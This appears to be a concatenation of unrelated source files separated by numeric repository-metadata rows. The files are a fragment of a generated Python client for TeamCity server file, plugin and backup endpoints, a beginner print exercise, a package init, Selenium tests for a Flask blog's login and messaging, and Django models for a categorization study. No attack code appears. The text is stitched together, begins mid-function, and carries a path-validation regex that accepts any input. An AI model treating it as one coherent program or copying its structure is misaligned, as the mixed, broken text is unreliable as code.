if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_metadata`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/metadata{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='File', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_root_with_http_info(self, area_id, **kwargs): # noqa: E501
"""get_root # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_root_with_http_info(area_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['area_id', 'base_path', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_root" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_root`") # noqa: E501
collection_formats = {}
path_params = {}
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_zipped_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_zipped # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_zipped_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str name:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'base_path', 'locator', 'name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_zipped" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_zipped`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_zipped`") # noqa: E501
if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_zipped`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/archived{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_plugins_with_http_info(self, **kwargs): # noqa: E501
"""serve_plugins # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_plugins_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str fields:
:return: Plugins
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_plugins" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/plugins', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Plugins', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_server_info_with_http_info(self, **kwargs): # noqa: E501
"""serve_server_info # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_server_info_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str fields:
:return: Server
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_server_info" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Server', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __serve_server_version_with_http_info(self, field, **kwargs): # noqa: E501
"""serve_server_version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__serve_server_version_with_http_info(field, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str field: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method serve_server_version" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'field' is set
if ('field' not in params or
params['field'] is None):
raise ValueError("Missing the required parameter `field` when calling `serve_server_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'field' in params:
if isinstance(params['field'], TeamCityObject):
path_params['field'] = params['field'].locator_id
else:
path_params['field'] = params['field'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/{field}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __start_backup_with_http_info(self, **kwargs): # noqa: E501
"""start_backup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__start_backup_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str file_name:
:param bool add_timestamp:
:param bool include_configs:
:param bool include_database:
:param bool include_build_logs:
:param bool include_personal_changes:
:param bool include_running_builds:
:param bool include_supplimentary_data:
:param BackupProcessManager body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_name', 'add_timestamp', 'include_configs', 'include_database', 'include_build_logs', 'include_personal_changes', 'include_running_builds', 'include_supplimentary_data', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method start_backup" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'file_name' in params:
query_params.append(('fileName', params['file_name'])) # noqa: E501
if 'add_timestamp' in params:
query_params.append(('addTimestamp', params['add_timestamp'])) # noqa: E501
if 'include_configs' in params:
query_params.append(('includeConfigs', params['include_configs'])) # noqa: E501
if 'include_database' in params:
query_params.append(('includeDatabase', params['include_database'])) # noqa: E501
if 'include_build_logs' in params:
query_params.append(('includeBuildLogs', params['include_build_logs'])) # noqa: E501
if 'include_personal_changes' in params:
query_params.append(('includePersonalChanges', params['include_personal_changes'])) # noqa: E501
if 'include_running_builds' in params:
query_params.append(('includeRunningBuilds', params['include_running_builds'])) # noqa: E501
if 'include_supplimentary_data' in params:
query_params.append(('includeSupplimentaryData', params['include_supplimentary_data'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/backup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.678798
| 218
| 0.594581
| 7,631
| 66,953
| 4.939589
| 0.026864
| 0.047965
| 0.025256
| 0.032472
| 0.955033
| 0.944819
| 0.939911
| 0.929379
| 0.92341
| 0.918475
| 0
| 0.015916
| 0.308395
| 66,953
| 1,730
| 219
| 38.701156
| 0.798121
| 0.281167
| 0
| 0.796541
| 1
| 0
| 0.193862
| 0.0459
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035605
| false
| 0
| 0.012208
| 0
| 0.101729
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b42823f40239c17859f4a2b140cda395d978f8cf
| 518
|
py
|
Python
|
Data Scientist Career Path/3. Python Fundamentals/6. Python Loop/1. Intro to Loop/1. loop.py
|
myarist/Codecademy
|
2ba0f104bc67ab6ef0f8fb869aa12aa02f5f1efb
|
[
"MIT"
] | 23
|
2021-06-06T15:35:55.000Z
|
2022-03-21T06:53:42.000Z
|
Data Scientist Career Path/3. Python Fundamentals/6. Python Loop/1. Intro to Loop/1. loop.py
|
shivaniverma1/Data-Scientist
|
f82939a411484311171465591455880c8e354750
|
[
"MIT"
] | null | null | null |
Data Scientist Career Path/3. Python Fundamentals/6. Python Loop/1. Intro to Loop/1. loop.py
|
shivaniverma1/Data-Scientist
|
f82939a411484311171465591455880c8e354750
|
[
"MIT"
] | 9
|
2021-06-08T01:32:04.000Z
|
2022-03-18T15:38:09.000Z
|
# Write 10 print() statements below!
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
print("This can be so much easier with loops!")
| 43.166667
| 47
| 0.727799
| 95
| 518
| 3.968421
| 0.136842
| 0.238727
| 0.318302
| 0.371353
| 0.928382
| 0.928382
| 0.928382
| 0.928382
| 0.928382
| 0.928382
| 0
| 0.00464
| 0.167954
| 518
| 12
| 48
| 43.166667
| 0.87007
| 0.065637
| 0
| 1
| 0
| 0
| 0.788382
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
c3250f76c7eb68af55d6451ab5d627c3564607b7
| 179
|
py
|
Python
|
QGOpt/any_metric_manifolds/__init__.py
|
vnechaev/QGOpt
|
697f02d89df67a576cd6953ffdd2db62970727da
|
[
"Apache-2.0"
] | null | null | null |
QGOpt/any_metric_manifolds/__init__.py
|
vnechaev/QGOpt
|
697f02d89df67a576cd6953ffdd2db62970727da
|
[
"Apache-2.0"
] | null | null | null |
QGOpt/any_metric_manifolds/__init__.py
|
vnechaev/QGOpt
|
697f02d89df67a576cd6953ffdd2db62970727da
|
[
"Apache-2.0"
] | null | null | null |
"""The package contains class describing manifolds with arbitrary metrics"""
from QGOpt.any_metric_manifolds.stiefel import StiefelManifold
import QGOpt.any_metric_manifolds.utils
| 59.666667
| 76
| 0.865922
| 23
| 179
| 6.565217
| 0.73913
| 0.10596
| 0.18543
| 0.304636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078212
| 179
| 3
| 77
| 59.666667
| 0.915152
| 0.391061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c35ec34bca9d31fa383b11657895dfcc192d7398
| 6,626
|
py
|
Python
|
tests/end-to-end/test_selenium.py
|
orached/itora_tuto
|
8de36d834fc7ef2dc8895ec7ac048fb420de76e3
|
[
"MIT"
] | null | null | null |
tests/end-to-end/test_selenium.py
|
orached/itora_tuto
|
8de36d834fc7ef2dc8895ec7ac048fb420de76e3
|
[
"MIT"
] | 3
|
2020-03-24T18:03:03.000Z
|
2021-02-02T22:23:27.000Z
|
tests/end-to-end/test_selenium.py
|
orached/itora_tuto
|
8de36d834fc7ef2dc8895ec7ac048fb420de76e3
|
[
"MIT"
] | null | null | null |
import pytest
import re
def test_home_page(setUp_selenium, populate_db):
"""
GIVEN a new visitor
WHEN he access to home page
THEN posts are displayed
"""
setUp_selenium.get("http://localhost:5000")
assert re.search('<p>post from john</p>',
setUp_selenium.page_source)
def test_login_page(setUp_selenium, populate_db):
"""
GIVEN a new visitor
WHEN he tries to login
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
re.search('<h1>Sign In</h1>', setUp_selenium.page_source)
# log in
setUp_selenium.find_element_by_name('username').\
send_keys('john')
setUp_selenium.find_element_by_name('password').send_keys('cat')
setUp_selenium.find_element_by_name('submit').click()
assert re.search('<p>post from susan</p>',
setUp_selenium.page_source)
assert re.search('Se déconnecter', setUp_selenium.page_source)
# navigate to logout page
setUp_selenium.find_element_by_link_text('Se déconnecter').click()
def test_registration_page(setUp_selenium):
"""
GIVEN a new visitor
WHEN he tries to register
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to registration page
setUp_selenium.find_element_by_link_text('Se connecter').click()
setUp_selenium.find_element_by_link_text('S\'enregistrer').click()
# register
setUp_selenium.find_element_by_name('username').\
send_keys('donald')
setUp_selenium.find_element_by_name('email').\
send_keys('donald@example.com')
setUp_selenium.find_element_by_name('password').send_keys('duck')
setUp_selenium.find_element_by_name('password2').send_keys('duck')
setUp_selenium.find_element_by_name('submit').click()
assert re.search('Un mail de confirmation vous a été envoyé.',
setUp_selenium.page_source)
# login with the registred user
setUp_selenium.find_element_by_name('username').\
send_keys('donald')
setUp_selenium.find_element_by_name('password').send_keys('duck')
setUp_selenium.find_element_by_name('submit').click()
setUp_selenium.find_element_by_link_text('Articles').click()
assert re.search('Vous n\'avez pas encore confirmer votre compte.',
setUp_selenium.page_source)
setUp_selenium.find_element_by_link_text('Profil').click()
assert re.search('Vous n\'avez pas encore confirmer votre compte.',
setUp_selenium.page_source)
@pytest.mark.skip(reason='Must learn more about how to test summernote field')
def test_post_creation(setUp_selenium, populate_db):
"""
GIVEN a registred user
WHEN he tries to add a new post
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
# log in
setUp_selenium.find_element_by_name('username').\
send_keys('john')
setUp_selenium.find_element_by_name('password').send_keys('cat')
setUp_selenium.find_element_by_name('submit').click()
# navigate to post management page
setUp_selenium.find_element_by_link_text('Articles').click()
setUp_selenium.find_element_by_name('title').\
send_keys('Post with selenium webdriver')
setUp_selenium.find_element_by_name('post').\
send_keys('This is a post created by an automated test case with Selenium webdriver')
setUp_selenium.find_element_by_name('submit').click()
assert re.search('Votre article est publié !',
setUp_selenium.page_source)
def test_send_message(setUp_selenium, populate_db):
"""
GIVEN an authenticated user
WHEN he sent a message to a registred user
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
# log in
setUp_selenium.find_element_by_name('username').\
send_keys('john')
setUp_selenium.find_element_by_name('password').send_keys('cat')
setUp_selenium.find_element_by_name('submit').click()
# navigate to susan profile page
setUp_selenium.find_element_by_link_text('susan').click()
setUp_selenium.find_element_by_link_text('Envoyer un message privé').click()
setUp_selenium.find_element_by_name('message').\
send_keys('Message sent to susan from john via selenium webdriver')
setUp_selenium.find_element_by_name('submit').click()
assert re.search('Votre message a été envoyé.',
setUp_selenium.page_source)
# navigate to logout page
setUp_selenium.find_element_by_link_text('Se déconnecter').click()
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
# log in with Susan account
setUp_selenium.find_element_by_name('username').\
send_keys('susan')
setUp_selenium.find_element_by_name('password').send_keys('dog')
setUp_selenium.find_element_by_name('submit').click()
setUp_selenium.find_element_by_partial_link_text('Messages').click()
assert "Message sent to susan from john via selenium webdriver" in setUp_selenium.page_source
def test_follow_unfollow(setUp_selenium, populate_db):
"""
GIVEN an authenticated user
WHEN he follow or unfollow a user
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
# log in
setUp_selenium.find_element_by_name('username').\
send_keys('john')
setUp_selenium.find_element_by_name('password').send_keys('cat')
setUp_selenium.find_element_by_name('submit').click()
# navigate to susan profile page
setUp_selenium.find_element_by_link_text('mary').click()
setUp_selenium.find_element_by_link_text('Follow').click()
assert 'Vous suivez maintenant mary !' in setUp_selenium.page_source
setUp_selenium.get("http://localhost:5000")
setUp_selenium.find_element_by_link_text('susan').click()
setUp_selenium.find_element_by_link_text('Unfollow').click()
assert 'Vous ne suivez plus susan.' in setUp_selenium.page_source
#assert '<p>post from mary</p>' in setUp_selenium.page_source
#assert '<p>post from susan</p>' not in setUp_selenium.page_source
| 41.936709
| 97
| 0.715515
| 905
| 6,626
| 4.923757
| 0.150276
| 0.215889
| 0.179309
| 0.253142
| 0.821813
| 0.80588
| 0.75202
| 0.720153
| 0.694794
| 0.612882
| 0
| 0.0057
| 0.179143
| 6,626
| 157
| 98
| 42.203822
| 0.813569
| 0.151826
| 0
| 0.602151
| 0
| 0
| 0.201391
| 0
| 0
| 0
| 0
| 0
| 0.11828
| 1
| 0.064516
| false
| 0.086022
| 0.021505
| 0
| 0.086022
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
c37cbb0522d43b820944549b0224eabcfc5636c3
| 9,350
|
py
|
Python
|
Questionnaire_type2/models.py
|
AdityaKapoor74/Supervised_Categorization_Study_Pt2
|
abedfa64d708360694e5cc00cfae866c5cfaebe8
|
[
"MIT"
] | null | null | null |
Questionnaire_type2/models.py
|
AdityaKapoor74/Supervised_Categorization_Study_Pt2
|
abedfa64d708360694e5cc00cfae866c5cfaebe8
|
[
"MIT"
] | null | null | null |
Questionnaire_type2/models.py
|
AdityaKapoor74/Supervised_Categorization_Study_Pt2
|
abedfa64d708360694e5cc00cfae866c5cfaebe8
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class UserDetails(models.Model):
class Meta:
verbose_name_plural = "User Details"
first_name = models.CharField(max_length=100,blank=True,null=True,default=None)
last_name = models.CharField(max_length=100,blank=True,null=True,default=None)
email = models.EmailField()
gender = models.CharField(max_length=10,blank=True,null=True,default=None)
city = models.CharField(max_length=100,blank=True,null=True,default=None)
country = models.CharField(max_length=100,blank=True,null=True,default=None)
age = models.IntegerField(blank=True, null=True, default=None)
set_num = models.CharField(max_length=10,blank=True,null=True,default=None)
def __str__(self):
return self.first_name+' '+self.last_name
class Observe_And_Learn_Samples_set1(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 1"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Observe_And_Learn_Samples_set2(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 2"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Observe_And_Learn_Samples_set3(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 3"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Observe_And_Learn_Samples_set4(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 4"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Observe_And_Learn_Samples_set5(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 5"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set1(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 1"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set2(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 2"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set3(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 3"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set4(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 4"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set5(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 5"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set1(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 1"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set2(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 2"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set3(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 3"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set4(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 4"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set5(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 5"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class UserResponse_Common_Features_Test_set1(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 1"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set1, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
iteration = models.IntegerField(default=1)
time_taken = models.FloatField(default=None, blank=False)
class UserResponse_Common_Features_Test_set2(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 2"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set2, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
iteration = models.IntegerField(default=1)
class UserResponse_Common_Features_Test_set3(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 3"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set3, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
iteration = models.IntegerField(default=1)
time_taken = models.FloatField(default=None, blank=False)
class UserResponse_Common_Features_Test_set4(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 4"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set4, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
iteration = models.IntegerField(default=1)
time_taken = models.FloatField(default=None, blank=False)
class UserResponse_Common_Features_Test_set5(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 5"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set5, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
iteration = models.IntegerField(default=1)
time_taken = models.FloatField(default=None, blank=False)
class UserResponsesForDescription(models.Model):
class Meta:
verbose_name_plural = "User Responses for Description"
description = models.TextField(default=None, null=True, blank=True)
set_number = models.CharField(max_length=10,blank=True,null=True,default=None)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
class CommonFeatureTable(models.Model):
class Meta:
verbose_name_plural = "Common Feature Test Table"
user_id = models.ForeignKey(UserDetails, on_delete=models.CASCADE)
set_number = models.IntegerField(default=None,blank=False)
block_number = models.IntegerField(default=None,blank=False)
sequence_number = models.IntegerField(default=None,blank=False)
file_name = models.CharField(max_length=150,blank=False,default=None)
user_option = models.CharField(max_length=10, default=None)
correct_option = models.CharField(max_length=10, default=None)
correct = models.IntegerField(default=None,blank=False)
time_taken = models.FloatField(default=None, blank=False)
timestamp = models.DateTimeField(editable=True, null=False, blank=False)
class ClassifyStimuiTable(models.Model):
class Meta:
verbose_name_plural = "Classify Stimluli Table"
user_id = models.ForeignKey(UserDetails, on_delete=models.CASCADE)
set_number = models.IntegerField(default=None, blank=False)
block_number = models.IntegerField(default=None, blank=False)
sequence_number = models.IntegerField(default=None, blank=False)
file_name = models.CharField(max_length=150, blank=False, default=None)
user_option = models.CharField(max_length=10, default=None)
correct = models.IntegerField(default=None, blank=False)
time_taken = models.FloatField(default=None, blank=False)
timestamp = models.DateTimeField(editable=True, null=False, blank=False)
| 38.79668
| 93
| 0.759358
